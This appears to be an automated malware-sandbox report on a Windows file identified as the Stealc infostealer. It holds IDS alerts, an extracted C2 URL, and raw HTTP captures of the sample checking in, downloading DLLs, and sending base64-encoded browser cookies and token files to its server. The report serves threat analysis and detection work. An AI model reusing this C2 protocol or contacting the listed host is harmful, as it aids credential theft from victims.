Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00817240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00817240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00828EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00828EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C666C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C666C80

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49705 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49705 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.5:49705
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49705 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.5:49705
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49705 -> 185.215.113.37:80

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDAECAEBKJJJKEBKKJDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 32 45 32 39 45 30 46 37 34 46 34 30 33 33 30 36 30 30 37 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 2d 2d 0d 0a Data Ascii: ------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="hwid"A02E29E0F74F4033060071------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="build"doma------KJDAECAEBKJJJKEBKKJD--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCFBFHIEBKJKFHIEBFBHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 65 39 66 65 63 31 37 33 38 39 61 33 34 32 33 36 61 64 36 31 65 36 36 31 36 36 31 33 61 36 33 37 65 37 62 30 35 33 61 65 31 37 35 65 64 65 36 63 66 32 61 30 64 66 32 65 66 65 66 64 31 34 35 62 34 62 36 66 61 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 2d 2d 0d 0a Data Ascii: ------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="token"9ae9fec17389a34236ad61e6616613a637e7b053ae175ede6cf2a0df2efefd145b4b6fa6------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="message"browsers------KFCFBFHIEBKJKFHIEBFB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDHIDAAFHIIDGDBFIEHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 65 39 66 65 63 31 37 33 38 39 61 33 34 32 33 36 61 64 36 31 65 36 36 31 36 36 31 33 61 36 33 37 65 37 62 30 35 33 61 65 31 37 35 65 64 65 36 63 66 32 61 30 64 66 32 65 66 65 66 64 31 34 35 62 34 62 36 66 61 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 2d 2d 0d 0a Data Ascii: ------ECGDHIDAAFHIIDGDBFIEContent-Disposition: form-data; name="token"9ae9fec17389a34236ad61e6616613a637e7b053ae175ede6cf2a0df2efefd145b4b6fa6------ECGDHIDAAFHIIDGDBFIEContent-Disposition: form-data; name="message"plugins------ECGDHIDAAFHIIDGDBFIE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHDHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 65 39 66 65 63 31 37 33 38 39 61 33 34 32 33 36 61 64 36 31 65 36 36 31 36 36 31 33 61 36 33 37 65 37 62 30 35 33 61 65 31 37 35 65 64 65 36 63 66 32 61 30 64 66 32 65 66 65 66 64 31 34 35 62 34 62 36 66 61 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 2d 2d 0d 0a Data Ascii: ------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="token"9ae9fec17389a34236ad61e6616613a637e7b053ae175ede6cf2a0df2efefd145b4b6fa6------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="message"fplugins------FCBFBGDBKJKECAAKKFHD--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCBAEHJJJKKFIDGHJECHost: 185.215.113.37Content-Length: 6971Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHJJECBKKECFIEBGCAKHost: 185.215.113.37Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 65 39 66 65 63 31 37 33 38 39 61 33 34 32 33 36 61 64 36 31 65 36 36 31 36 36 31 33 61 36 33 37 65 37 62 30 35 33 61 65 31 37 35 65 64 65 36 63 66 32 61 30 64 66 32 65 66 65 66 64 31 34 35 62 34 62 36 66 61 36 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 2d 2d 0d 0a Data Ascii: ------IEHJJECBKKECFIEBGCAKContent-Disposition: form-data; name="token"9ae9fec17389a34236ad61e6616613a637e7b053ae175ede6cf2a0df2efefd145b4b6fa6------IEHJJECBKKECFIEBGCAKContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IEHJJECBKKECFIEBGCAKContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Y
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGHIDBKJEGIECBGIEHCHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 65 39 66 65 63 31 37 33 38 39 61 33 34 32 33 36 61 64 36 31 65 36 36 31 36 36 31 33 61 36 33 37 65 37 62 30 35 33 61 65 31 37 35 65 64 65 36 63 66 32 61 30 64 66 32 65 66 65 66 64 31 34 35 62 34 62 36 66 61 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 2d 2d 0d 0a Data Ascii: ------GDGHIDBKJEGIECBGIEHCContent-Disposition: form-data; name="token"9ae9fec17389a34236ad61e6616613a637e7b053ae175ede6cf2a0df2efefd145b4b6fa6------GDGHIDBKJEGIECBGIEHCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDGHIDBKJEGIECBGIEHCContent-Disposition: form-data; name="file"------GDGHIDBKJEGIECBGIEHC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBAKKKFBGDHJKFHJJJJHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 65 39 66 65 63 31 37 33 38 39 61 33 34 32 33 36 61 64 36 31 65 36 36 31 36 36 31 33 61 36 33 37 65 37 62 30 35 33 61 65 31 37 35 65 64 65 36 63 66 32 61 30 64 66 32 65 66 65 66 64 31 34 35 62 34 62 36 66 61 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 2d 2d 0d 0a Data Ascii: ------GDBAKKKFBGDHJKFHJJJJContent-Disposition: form-data; name="token"9ae9fec17389a34236ad61e6616613a637e7b053ae175ede6cf2a0df2efefd145b4b6fa6------GDBAKKKFBGDHJKFHJJJJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDBAKKKFBGDHJKFHJJJJContent-Disposition: form-data; name="file"------GDBAKKKFBGDHJKFHJJJJ--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHCAAAAKJJDAKECBGIJEHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCFBFHIEBKJKFHIEBFBHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 65 39 66 65 63 31 37 33 38 39 61 33 34 32 33 36 61 64 36 31 65 36 36 31 36 36 31 33 61 36 33 37 65 37 62 30 35 33 61 65 31 37 35 65 64 65 36 63 66 32 61 30 64 66 32 65 66 65 66 64 31 34 35 62 34 62 36 66 61 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 2d 2d 0d 0a Data Ascii: ------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="token"9ae9fec17389a34236ad61e6616613a637e7b053ae175ede6cf2a0df2efefd145b4b6fa6------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="message"wallets------KFCFBFHIEBKJKFHIEBFB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDHIDAAFHIIDGDBFIEHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 65 39 66 65 63 31 37 33 38 39 61 33 34 32 33 36 61 64 36 31 65 36 36 31 36 36 31 33 61 36 33 37 65 37 62 30 35 33 61 65 31 37 35 65 64 65 36 63 66 32 61 30 64 66 32 65 66 65 66 64 31 34 35 62 34 62 36 66 61 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 2d 2d 0d 0a Data Ascii: ------ECGDHIDAAFHIIDGDBFIEContent-Disposition: form-data; name="token"9ae9fec17389a34236ad61e6616613a637e7b053ae175ede6cf2a0df2efefd145b4b6fa6------ECGDHIDAAFHIIDGDBFIEContent-Disposition: form-data; name="message"files------ECGDHIDAAFHIIDGDBFIE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBKKFBAEGDHJJJJKFBKHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 65 39 66 65 63 31 37 33 38 39 61 33 34 32 33 36 61 64 36 31 65 36 36 31 36 36 31 33 61 36 33 37 65 37 62 30 35 33 61 65 31 37 35 65 64 65 36 63 66 32 61 30 64 66 32 65 66 65 66 64 31 34 35 62 34 62 36 66 61 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 2d 2d 0d 0a Data Ascii: ------AFBKKFBAEGDHJJJJKFBKContent-Disposition: form-data; name="token"9ae9fec17389a34236ad61e6616613a637e7b053ae175ede6cf2a0df2efefd145b4b6fa6------AFBKKFBAEGDHJJJJKFBKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AFBKKFBAEGDHJJJJKFBKContent-Disposition: form-data; name="file"------AFBKKFBAEGDHJJJJKFBK--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIJEGCBGIDGHIDHDGCBHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 4a 45 47 43 42 47 49 44 47 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 65 39 66 65 63 31 37 33 38 39 61 33 34 32 33 36 61 64 36 31 65 36 36 31 36 36 31 33 61 36 33 37 65 37 62 30 35 33 61 65 31 37 35 65 64 65 36 63 66 32 61 30 64 66 32 65 66 65 66 64 31 34 35 62 34 62 36 66 61 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 45 47 43 42 47 49 44 47 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 45 47 43 42 47 49 44 47 48 49 44 48 44 47 43 42 2d 2d 0d 0a Data Ascii: ------KFIJEGCBGIDGHIDHDGCBContent-Disposition: form-data; name="token"9ae9fec17389a34236ad61e6616613a637e7b053ae175ede6cf2a0df2efefd145b4b6fa6------KFIJEGCBGIDGHIDHDGCBContent-Disposition: form-data; name="message"ybncbhylepme------KFIJEGCBGIDGHIDHDGCB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIJDHIDBGHJKECBFIIDHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 65 39 66 65 63 31 37 33 38 39 61 33 34 32 33 36 61 64 36 31 65 36 36 31 36 36 31 33 61 36 33 37 65 37 62 30 35 33 61 65 31 37 35 65 64 65 36 63 66 32 61 30 64 66 32 65 66 65 66 64 31 34 35 62 34 62 36 66 61 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 2d 2d 0d 0a Data Ascii: ------DHIJDHIDBGHJKECBFIIDContent-Disposition: form-data; name="token"9ae9fec17389a34236ad61e6616613a637e7b053ae175ede6cf2a0df2efefd145b4b6fa6------DHIJDHIDBGHJKECBFIIDContent-Disposition: form-data; name="message"wkkjqaiaxkhb------DHIJDHIDBGHJKECBFIID--

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
